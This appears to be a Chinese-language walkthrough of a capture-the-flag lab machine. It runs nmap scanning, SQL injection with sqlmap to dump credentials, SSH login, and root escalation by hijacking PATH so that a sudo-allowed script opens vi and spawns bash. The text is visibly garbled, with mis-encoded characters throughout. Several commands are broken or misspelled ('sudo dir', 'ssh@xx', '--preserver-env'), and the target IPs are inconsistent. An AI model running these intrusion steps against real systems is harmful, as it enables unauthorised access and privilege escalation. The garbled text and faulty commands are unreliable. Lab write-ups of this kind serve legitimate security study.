主機(jī)發(fā)現(xiàn)
sudo nmap -sT --min-rate 10000 -p- 192.168.28.32 -oA nmapscan/ports
sudo nmap -sT -sC -sV -O -p22,8080 192.168.28.3 -oA nmapscan/detail
sudo nmap -sU --top-ports 20 192.168.28.3 -oA nmapscan/udp
(相關(guān)資料圖)
sudo nmap --script=vuln -p22,8080 192.168.28.3 -oA nmapscan/vuln
訪問(wèn)http網(wǎng)頁(yè)
同時(shí)進(jìn)行爆破目錄
sudo dir -u http://xx -w xx
訪問(wèn)網(wǎng)頁(yè)時(shí)必須要讀全todolist,根據(jù)開(kāi)發(fā)習(xí)慣和交互行問(wèn)推斷技術(shù)和可能的漏洞
根據(jù)提示不斷點(diǎn)擊發(fā)現(xiàn)一個(gè)具有數(shù)字id的提示
利用這個(gè)進(jìn)行sqlmap跑看看能否跑出
sudo sqlmap -u http://xx.xx.xx.xx:8080/mercuryfacts/1 --dbms mysql --dbs --batch#跑出數(shù)據(jù)庫(kù)
獲得用戶密碼
發(fā)現(xiàn)賬戶密碼嘗試ssh登錄
ssh@xx.xx.xx.xx
成功getshell
權(quán)限查看
whoami uname -a lsb_release -a(內(nèi)核版本) ip a sudo -l cat /etc/crontab
查看家目錄是否有flag同時(shí)發(fā)現(xiàn)一個(gè)目錄
進(jìn)入此目錄并查看txt發(fā)現(xiàn)了賬號(hào)和base64加密的密碼對(duì)linuxmaster賬戶的密碼進(jìn)行解密
切換的linuxmaster用戶
su linuxmaster xx
查看whoami ip a sudo -l cat /etc/crontab
sudo -l
利用root賬號(hào)需要設(shè)置一個(gè)環(huán)境變量才能執(zhí)行check_syslog.sh這個(gè)腳本
查看check_syslog.sh的腳本
可以發(fā)現(xiàn)是tail命令運(yùn)行
通過(guò)路徑優(yōu)先查找的方式進(jìn)行提權(quán)
1.用戶家目錄設(shè)置軟連接
ln -s /bin/vi tail
2.將當(dāng)前路徑設(shè)置為環(huán)境變量
export PATH=.:$PATH
#驗(yàn)證
echo $PATH
3.根據(jù)SETENV設(shè)置環(huán)境變量并執(zhí)行腳本
sudo --preserver-env=PATH /usr/bin/check_syslog.sh
sudo的SETENV標(biāo)記表示允許用戶設(shè)置環(huán)境變量,而--preserve-env選項(xiàng)表示保留當(dāng)前環(huán)境變量并傳遞給執(zhí)行的命令
sudo --preverse-env=PATH /usr/bin/check_syslog.sh
成功執(zhí)行了腳本,因?yàn)閠ail在環(huán)境變量中指向的時(shí)/bin/vi所以成功打開(kāi)了一個(gè)vi界面
在vi界面進(jìn)行提權(quán)的語(yǔ)句時(shí) :!bash
成功提權(quán)
關(guān)鍵詞:
責(zé)任編輯:Rex_04